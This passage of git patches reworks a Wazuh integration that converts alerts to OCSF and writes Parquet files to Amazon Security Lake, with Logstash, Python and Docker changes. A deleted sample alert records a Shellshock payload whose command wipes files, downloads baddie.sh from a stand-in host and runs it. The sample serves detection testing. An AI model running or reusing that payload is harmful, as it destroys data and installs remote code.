b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -29,15 +29,16 @@ output { # codec => rubydebug #} - #pipe - #{ - # id => "securityLake" - # command => "/usr/share/logstash/bin/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --outputfolder s3://" - #} - - file { - id => "fileOutputPipeline" - path => "/tmp/indexer-to-file.json" + pipe + { + id => "securityLake" + #command => "/usr/share/logstash/bin/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --outputfolder s3://s3.ninja:9000/securitylake" + command => "/usr/share/logstash/bin/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --bucketname securitylake --s3endpoint s3.ninja:9000 --s3profile default" } + #file { + # id => "fileOutputPipeline" + # path => "/tmp/indexer-to-file.json" + #} + } diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index f6931bcc51eb1..c1c2c5d7118e0 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -28,15 +28,11 @@ def s3authenticate(profile, endpoint=None, scheme='https'): scheme=scheme) return s3fs - - - - -def encode_parquet(list,foldername,filename): +def encode_parquet(list,bucketname,filename,filesystem): try: table = Table.from_pylist(list) - parquet.write_table(table, '{}.parquet'.format(filename), filesystem=localS3) + parquet.write_table(table, '{}/{}.parquet'.format(bucketname,filename), filesystem=filesystem) except Exception as e: logging.error(e) raise @@ -62,12 +58,12 @@ def get_elapsedseconds(reference_timestamp): date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-b','--bucketname', type=str, action='store', help='S3 bucket name to write parquet files to') parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to AWS\')') parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') - parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() @@ -98,7 +94,7 @@ def get_elapsedseconds(reference_timestamp): if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: logging.info('Writing data to parquet file') s3fs = s3authenticate(args.s3profile,args.s3endpoint) - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) + encode_parquet(output_buffer,args.bucketname,'wazuh-{}'.format(date),s3fs) starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] From 811f94030578b2c90f095020f11314c77a4174d2 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 28 Feb 2024 08:32:11 -0300 Subject: [PATCH 72/77] Renamed script to match convention --- integrations/amazon-security-lake/run.py | 136 +++++++++++++++--- .../stdin_to_securitylake.py | 112 --------------- 2 files changed, 117 insertions(+), 131 deletions(-) mode change 100644 => 100755 integrations/amazon-security-lake/run.py delete mode 100755 integrations/amazon-security-lake/stdin_to_securitylake.py diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py old mode 100644 new mode 100755 index c26adffa2ea0f..94afd33959918 --- a/integrations/amazon-security-lake/run.py +++ b/integrations/amazon-security-lake/run.py @@ -1,26 +1,124 @@ -#!/env/bin/python3.9 +#!/env/bin/python3 -import transform +# vim: bkc=yes bk wb + +import os +import sys +import argparse +import logging +import time import json +import datetime +import boto3 +from pyarrow import parquet, Table, fs +from ocsf import converter + +block_ending = { "block_ending": True } + +def check_fd_open(file): + return file.closed + +def s3authenticate(profile, endpoint=None, scheme='https'): + session = boto3.session.Session(profile_name=profile) + credentials = session.get_credentials() + + if endpoint != None: + scheme='http' + + s3fs = fs.S3FileSystem( + endpoint_override=endpoint, + access_key=credentials.access_key, + secret_key=credentials.secret_key, + scheme=scheme) + + return s3fs + +def encode_parquet(list,bucketname,filename,filesystem): + try: + table = Table.from_pylist(list) + parquet.write_table(table, '{}/{}'.format(bucketname,filename), filesystem=filesystem) + except Exception as e: + logging.error(e) + raise + +def map_block(fileobject, length): + output=[] + ocsf_mapped_alert = {} + for line in range(0, length): + line = fileobject.readline() + if line == '': + output.append(block_ending) + break + alert = json.loads(line) + ocsf_mapped_alert = converter.convert(alert) + output.append(ocsf_mapped_alert) + return output + +def timedelta(reference_timestamp): + current_time = datetime.datetime.now(datetime.timezone.utc) + return (current_time - reference_timestamp).total_seconds() + +def utctime(): + return datetime.datetime.now(datetime.timezone.utc) + +if __name__ == "__main__": + + parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-b','--bucketname', type=str, action='store', help='S3 bucket name to write parquet files to') + parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to AWS\')') + parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') + parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') + parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') + parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') + args = parser.parse_args() + + logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) + logging.info('BUFFERING STDIN') + + try: + + with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: + output_buffer = [] + loop_start_time = utctime() + + try: + s3fs = s3authenticate(args.s3profile,args.s3endpoint) + while True: + + current_block = map_block( stdin, args.linebuffer ) + + if current_block[-1] == block_ending: + output_buffer += current_block[0:-1] + time.sleep(args.sleeptime) + else: + output_buffer += current_block + + buffer_length = len(output_buffer) + + if buffer_length == 0: + continue + elapsed_seconds = timedelta(loop_start_time) -def _test(): - ocsf_event = {} - with open("./wazuh-event.sample.json", "r") as fd: - # Load from file descriptor - raw_event = json.load(fd) - try: - event = transform.converter.from_json(raw_event) - print(event) - ocsf_event = transform.converter.to_detection_finding(event) - print("") - print("--") - print("") - print(ocsf_event) + if buffer_length > args.maxlength or elapsed_seconds > args.pushinterval: + logging.info('Elapsed seconds: {}'.format(elapsed_seconds)) + loop_start_time = utctime() + timestamp = loop_start_time.strftime('%F_%H.%M.%S') + filename='wazuh-{}.parquet'.format(timestamp) + logging.info('Writing data to s3://{}/{}'.format(args.bucketname,filename)) + encode_parquet(output_buffer,args.bucketname,filename,s3fs) + output_buffer = [] - except KeyError as e: - raise (e) + except KeyboardInterrupt: + logging.info("Keyboard Interrupt issued") + exit(0) + logging.info('FINISHED RETRIEVING STDIN') -if __name__ == '__main__': - _test() + except Exception as e: + logging.error("Error running script") + logging.error(e) + raise diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py deleted file mode 100755 index c1c2c5d7118e0..0000000000000 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ /dev/null @@ -1,112 +0,0 @@ -#!/env/bin/python3 - -import os -import sys -import argparse -import logging -import time -import json -import datetime -import boto3 -from pyarrow import parquet, Table, fs -from ocsf import converter - -block_ending = { "block_ending": True } - - -def s3authenticate(profile, endpoint=None, scheme='https'): - session = boto3.session.Session(profile_name=profile) - credentials = session.get_credentials() - - if endpoint != None: - scheme='http' - - s3fs = fs.S3FileSystem( - endpoint_override=endpoint, - access_key=credentials.access_key, - secret_key=credentials.secret_key, - scheme=scheme) - - return s3fs - -def encode_parquet(list,bucketname,filename,filesystem): - try: - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(bucketname,filename), filesystem=filesystem) - except Exception as e: - logging.error(e) - raise - -def map_block(fileobject, length): - output=[] - ocsf_mapped_alert = {} - for line in range(0, length): - line = fileobject.readline() - if line == '': - output.append(block_ending) - break - alert = json.loads(line) - ocsf_mapped_alert = converter.convert(alert) - output.append(ocsf_mapped_alert) - return output - -def get_elapsedseconds(reference_timestamp): - current_time = datetime.datetime.now(datetime.timezone.utc) - return (current_time - reference_timestamp).total_seconds() - -if __name__ == "__main__": - date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') - parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') - parser.add_argument('-b','--bucketname', type=str, action='store', help='S3 bucket name to write parquet files to') - parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to AWS\')') - parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') - parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') - parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') - args = parser.parse_args() - #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) - logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) - logging.info('BUFFERING STDIN') - - try: - - with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: - output_buffer = [] - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - - try: - while True: - - current_block = map_block( stdin, args.linebuffer ) - - if current_block[-1] == block_ending: - output_buffer += current_block[0:-1] - time.sleep(args.sleeptime) - else: - output_buffer += current_block - - if len(output_buffer) == 0: - continue - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - logging.info('Writing data to parquet file') - s3fs = s3authenticate(args.s3profile,args.s3endpoint) - encode_parquet(output_buffer,args.bucketname,'wazuh-{}'.format(date),s3fs) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] - - except KeyboardInterrupt: - logging.info("Keyboard Interrupt issued") - exit(0) - - logging.info('FINISHED RETRIEVING STDIN') - - except Exception as e: - logging.error("Error running script") - logging.error(e) - raise - - From c421235037a5982ff9387bd42e2ad9f1a2321815 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 28 Feb 2024 09:12:05 -0300 Subject: [PATCH 73/77] Move argparse into its own function --- integrations/amazon-security-lake/run.py | 42 +++++++++++++----------- 1 file changed, 23 insertions(+), 19 deletions(-) diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py index 94afd33959918..24c236f625497 100755 --- a/integrations/amazon-security-lake/run.py +++ b/integrations/amazon-security-lake/run.py @@ -13,7 +13,25 @@ from pyarrow import parquet, Table, fs from ocsf import converter -block_ending = { "block_ending": True } + +logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) + +BLOCK_ENDING = { "block_ending": True } + + + +def create_arg_parser(): + parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-b','--bucketname', type=str, action='store', help='S3 bucket name to write parquet files to') + parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to AWS\')') + parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') + parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') + parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') + parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') + return parser def check_fd_open(file): return file.closed @@ -47,7 +65,7 @@ def map_block(fileobject, length): for line in range(0, length): line = fileobject.readline() if line == '': - output.append(block_ending) + output.append(BLOCK_ENDING) break alert = json.loads(line) ocsf_mapped_alert = converter.convert(alert) @@ -62,23 +80,9 @@ def utctime(): return datetime.datetime.now(datetime.timezone.utc) if __name__ == "__main__": - - parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') - parser.add_argument('-b','--bucketname', type=str, action='store', help='S3 bucket name to write parquet files to') - parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to AWS\')') - parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') - parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') - parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') - args = parser.parse_args() - - logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) - logging.info('BUFFERING STDIN') - try: + args = create_arg_parser().parse_args() + logging.info('BUFFERING STDIN') with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] @@ -90,7 +94,7 @@ def utctime(): current_block = map_block( stdin, args.linebuffer ) - if current_block[-1] == block_ending: + if current_block[-1] == BLOCK_ENDING: output_buffer += current_block[0:-1] time.sleep(args.sleeptime) else: From 3713fb174eb1167033f2c9799d4885b327afbbd5 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 28 Feb 2024 09:13:34 -0300 Subject: [PATCH 74/77] Add volumes to mount script and dependencies in compose file --- integrations/docker/amazon-security-lake.yml | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 28d925f97a34e..db142f151aeef 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -10,7 +10,7 @@ services: depends_on: wazuh.indexer: condition: service_healthy - command: bash -c "python run.py -a wazuh.indexer" + command: bash -c "python run.py -a wazuh.indexer -t1" wazuh.indexer: image: opensearchproject/opensearch:2.11.1 @@ -89,11 +89,22 @@ services: volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem - - ../amazon-security-lake/stdin_to_securitylake.py:/usr/share/logstash/bin/run.py + - ../amazon-security-lake/run.py:/usr/share/logstash/bin/run.py - ../amazon-security-lake/transform/:/usr/share/logstash/bin/transform/ + - ../amazon-security-lake/ocsf/:/usr/share/logstash/bin/ocsf/ + - ./credentials:/usr/share/logstash/.aws/credentials #command: tail -f /dev/null command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic + #s3.ninja: + # image: scireum/s3-ninja:latest + # container_name: s3.ninja + # hostname: s3.ninja + # ports: + # - "9444:9000" + # volumes: + # - ./s3-data:/home/sirius/data + wazuh-certs-generator: image: wazuh/wazuh-certs-generator:0.0.1 hostname: wazuh-certs-generator From f6329f4e44073277fc4048584685f4b74bc70336 Mon Sep 17 00:00:00 2001 From: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> Date: Wed, 28 Feb 2024 09:17:12 -0300 Subject: [PATCH 75/77] Delete integrations/ocsf-mapping.json Signed-off-by: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> --- integrations/ocsf-mapping.json | 86 ---------------------------------- 1 file changed, 86 deletions(-) delete mode 100644 integrations/ocsf-mapping.json diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json deleted file mode 100644 index c1238dac285df..0000000000000 --- a/integrations/ocsf-mapping.json +++ /dev/null @@ -1,86 +0,0 @@ -{ - "1.0.0": - { - "constants": - { - "activity_id" : 1, - "analytic.type" : "Rule", - "analytic.type_id" : 1, - "attacks.version" : "v13.1", - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "status_id" : 99, - "type_uid" : 200101 - }, - "mappings": - { - "analytic.category" : "rule.groups", - "analytic.name" : "decoder.name", - "analytic.uid" : "rule.id", - "attacks.tactics" : "rule.mitre.tactic", - "attacks.technique" : "rule.mitre.technique", - "count" : "rule.firedtimes", - "data_sources" : ["_index", "location", "manager.name"], - "finding.title" : "rule.description", - "finding.types" : "input.type", - "finding.uid" : "id", - "message" : "rule.description", - "nist" : "rule.nist_800_53", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" - } - }, - "1.1.0": - { - "constants": - { - "activity_id" : 1, - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "finding_info.analytic.type" : "Rule", - "finding_info.analytic.type_id" : 1, - "finding_info.attacks.version" : "v13.1", - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "status_id" : 99, - "type_uid" : 200101 - }, - "mappings": - { - "count" : "rule.firedtimes", - "finding_info.analytic.category" : "rule.groups", - "finding_info.analytic.name" : "decoder.name", - "finding_info.analytic.uid" : "rule.id", - "finding_info.attacks.tactic" : "rule.mitre.tactic", - "finding_info.attacks.technique" : "rule.mitre.technique", - "finding_info.title" : "rule.description", - "finding_info.types" : "input.type", - "finding_info.uid" : "id", - "message" : "rule.description", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" - } - } -} From 5cb2c38245f344b5ca9f4d4448e690edcf04eea7 Mon Sep 17 00:00:00 2001 From: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> Date: Wed, 28 Feb 2024 09:17:43 -0300 Subject: [PATCH 76/77] Delete integrations/amazon-security-lake/logstash/pipe-output.conf Signed-off-by: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> --- .../logstash/pipe-output.conf | 35 ------------------- 1 file changed, 35 deletions(-) delete mode 100644 integrations/amazon-security-lake/logstash/pipe-output.conf diff --git a/integrations/amazon-security-lake/logstash/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipe-output.conf deleted file mode 100644 index 4f64eb5a46a54..0000000000000 --- a/integrations/amazon-security-lake/logstash/pipe-output.conf +++ /dev/null @@ -1,35 +0,0 @@ -input { - opensearch { - hosts => ["127.0.0.1:9200"] - user => "${WAZUH_INDEXER_USERNAME}" - password => "${WAZUH_INDEXER_PASSWORD}" - index => "wazuh-alerts-4.x-*" - ssl => true - ca_file => "/etc/logstash/wi-certs/root-ca.pem" - query => '{ - "query": { - "range": { - "@timestamp": { - "gt": "now-1m" - } - } - } - }' - target => "_source" - schedule => "* * * * *" - } -} - -output { - - stdout { codec => rubydebug } - - pipe - { - id => "securityLake" - message_format => "%{_source}" - ttl => "10" - command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" - } - -} From 995036959eb08900c1759efeb3fdbd41c0412a5f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Mon, 4 Mar 2024 12:06:17 +0100 Subject: [PATCH 77/77] Remove old files --- .../amazon-security-lake/ocsf/__init__.py | 2 - .../amazon-security-lake/ocsf/converter.py | 90 ---------- .../amazon-security-lake/ocsf/test.py | 15 -- .../ocsf/wazuh-event.sample.json | 90 ---------- .../sl_integration_test.json | 162 ------------------ integrations/docker/amazon-security-lake.yml | 2 +- 6 files changed, 1 insertion(+), 360 deletions(-) delete mode 100644 integrations/amazon-security-lake/ocsf/__init__.py delete mode 100644 integrations/amazon-security-lake/ocsf/converter.py delete mode 100644 integrations/amazon-security-lake/ocsf/test.py delete mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json delete mode 100644 integrations/amazon-security-lake/sl_integration_test.json diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py deleted file mode 100644 index 777a7d20549b5..0000000000000 --- a/integrations/amazon-security-lake/ocsf/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -# Python module placeholder -# TODO export submodules \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py deleted file mode 100644 index 161012475cb14..0000000000000 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ /dev/null @@ -1,90 +0,0 @@ -#!/usr/bin/python3 - -# event comes from Filebeat -#event = {} -#print(event) - -def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level - - -def join(iterable, separator=","): - return (separator.join(iterable)) - - -def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - #"count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["_source"]["rule"]["groups"]), - #"name": event["_source"]["decoder"]["name"], - "type_id": 1, - "uid": event["_source"]["rule"]["id"], - }, - "attacks": { - "tactic": { - #"name": join(event["_source"]["rule"]["mitre"]["tactic"]), - "dummy": True - }, - "technique": { - #"name": join(event["_source"]["rule"]["mitre"]["technique"]), - #"uid": join(event["_source"]["rule"]["mitre"]["id"]), - "dummy": True - }, - "version": "v13.1" - }, - "title": event["_source"]["rule"]["description"], - "types": [ - #event["_source"]["input"]["type"] - 0 - ], - "uid": event["_source"]['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - #"raw_data": event["_source"]["full_log"], - "resources": [ - { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] - }, - ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), - "status_id": 99, - "time": event["_source"]["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - #event["_source"]["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] - ], - #"nist": event["_source"]["rule"]["nist_800_53"], # Array - } - } - - return ocsf_class_template diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/ocsf/test.py deleted file mode 100644 index e7d947848b067..0000000000000 --- a/integrations/amazon-security-lake/ocsf/test.py +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/python - -from converter import convert -import json - -converted_event = {} -with open("wazuh-event.sample.json", "r") as fd: - sample_event = json.load(fd) - # print(json.dumps(sample_event, indent=4)) - converted_event = convert(sample_event) - -if converted_event: - with open("wazuh-event.ocsf.json", "w") as fd: - json.dump(converted_event, fd) - print("Done") \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json deleted file mode 100644 index 3f35697a9fe36..0000000000000 --- a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "_index": "wazuh-alerts-4.x-2024.02.08", - "_id": "yBMliY0Bt8FzffO0BOIu", - "_version": 1, - "_score": null, - "_source": { - "input": { - "type": "log" - }, - "agent": { - "name": "redacted.com", - "id": "000" - }, - "manager": { - "name": "redacted.com" - }, - "data": { - "protocol": "GET", - "srcip": "000.111.222.10", - "id": "404", - "url": "/cgi-bin/jarrewrite.sh" - }, - "rule": { - "firedtimes": 1, - "mail": false, - "level": 6, - "pci_dss": [ - "11.4" - ], - "tsc": [ - "CC6.1", - "CC6.8", - "CC7.2", - "CC7.3" - ], - "description": "Shellshock attack attempt", - "groups": [ - "web", - "accesslog", - "attack" - ], - "mitre": { - "technique": [ - "Exploitation for Privilege Escalation", - "Exploit Public-Facing Application" - ], - "id": [ - "T1068", - "T1190" - ], - "tactic": [ - "Privilege Escalation", - "Initial Access" - ] - }, - "id": "31166", - "nist_800_53": [ - "SI.4" - ], - "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", - "gdpr": [ - "IV_35.7.d" - ] - }, - "location": "/var/log/nginx/access.log", - "decoder": { - "name": "web-accesslog" - }, - "id": "1707402914.872885", - "GeoLocation": { - "city_name": "Amsterdam", - "country_name": "Netherlands", - "region_name": "North Holland", - "location": { - "lon": 4.9087, - "lat": 52.3534 - } - }, - "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", - "timestamp": "2024-02-08T11:35:14.334-0300" - }, - "fields": { - "timestamp": [ - "2024-02-08T14:35:14.334Z" - ] - }, - "sort": [ - 1707402914334 - ] -} \ No newline at end of file diff --git a/integrations/amazon-security-lake/sl_integration_test.json b/integrations/amazon-security-lake/sl_integration_test.json deleted file mode 100644 index 684f9820c5679..0000000000000 --- a/integrations/amazon-security-lake/sl_integration_test.json +++ /dev/null @@ -1,162 +0,0 @@ -{"@version":"1","_source":{"manager":{"name":"ubuntu2204"},"decoder":{"name":"json"},"rule":{"firedtimes":3,"level":3,"tsc":["CC7.1","CC7.2"],"description":"The CVE-2007-4559 that affected python3.10 was solved due to a package removal/update or a system upgrade","groups":["vulnerability-detector"],"id":"23502","mail":false,"pci_dss":["11.2.1","11.2.3"],"gdpr":["IV_35.7.d"]},"location":"vulnerability-detector","timestamp":"2024-02-15T16:05:11.486-0300","id":"1708023911.181468","@timestamp":"2024-02-15T19:05:11.486Z","agent":{"id":"000","ip":"127.0.0.1","name":"localhost"},"input":{"type":"log"},"data":{"vulnerability":{"severity":"Medium","cvss":{"cvss2":{"base_score":"6.800000"}},"type":"Packages","status":"Solved","title":"CVE-2007-4559 affecting python3.10 was solved","package":{"architecture":"amd64","version":"3.10.6-1~22.04.2ubuntu1","name":"python3.10"},"enumeration":"CVE","updated":"2023-09-17T09:15:07Z","published":"2007-08-28T01:17:00Z","reference":"http://secunia.com/advisories/26623, http://www.vupen.com/english/advisories/2007/3022, http://mail.python.org/pipermail/python-dev/2007-August/074292.html, https://bugzilla.redhat.com/show_bug.cgi?id=263261, http://mail.python.org/pipermail/python-dev/2007-August/074290.html, https://security.gentoo.org/glsa/202309-06","cve":"CVE-2007-4559"}}},"@timestamp":"2024-02-15T19:06:00.230246531Z"} -{"@version":"1","_source":{"manager":{"name":"ubuntu2204"},"decoder":{"name":"json"},"rule":{"firedtimes":3,"level":3,"tsc":["CC7.1","CC7.2"],"description":"The CVE-2007-4559 that affected python3.10 was solved due to a package removal/update or a system upgrade","groups":["vulnerability-detector"],"id":"23502","mail":false,"pci_dss":["11.2.1","11.2.3"],"gdpr":["IV_35.7.d"]},"location":"vulnerability-detector","timestamp":"2024-02-15T16:05:11.486-0300","id":"1708023911.181468","@timestamp":"2024-02-15T19:05:11.486Z","agent":{"id":"000","ip":"127.0.0.1","name":"localhost"},"input":{"type":"log"},"data":{"vulnerability":{"severity":"Medium","cvss":{"cvss2":{"base_score":"6.800000"}},"type":"Packages","status":"Solved","title":"CVE-2007-4559 affecting python3.10 was solved","package":{"architecture":"amd64","version":"3.10.6-1~22.04.2ubuntu1","name":"python3.10"},"enumeration":"CVE","updated":"2023-09-17T09:15:07Z","published":"2007-08-28T01:17:00Z","reference":"http://secunia.com/advisories/26623, http://www.vupen.com/english/advisories/2007/3022, http://mail.python.org/pipermail/python-dev/2007-August/074292.html, https://bugzilla.redhat.com/show_bug.cgi?id=263261, http://mail.python.org/pipermail/python-dev/2007-August/074290.html, https://security.gentoo.org/glsa/202309-06","cve":"CVE-2007-4559"}}},"@timestamp":"2024-02-15T19:06:00.230246531Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 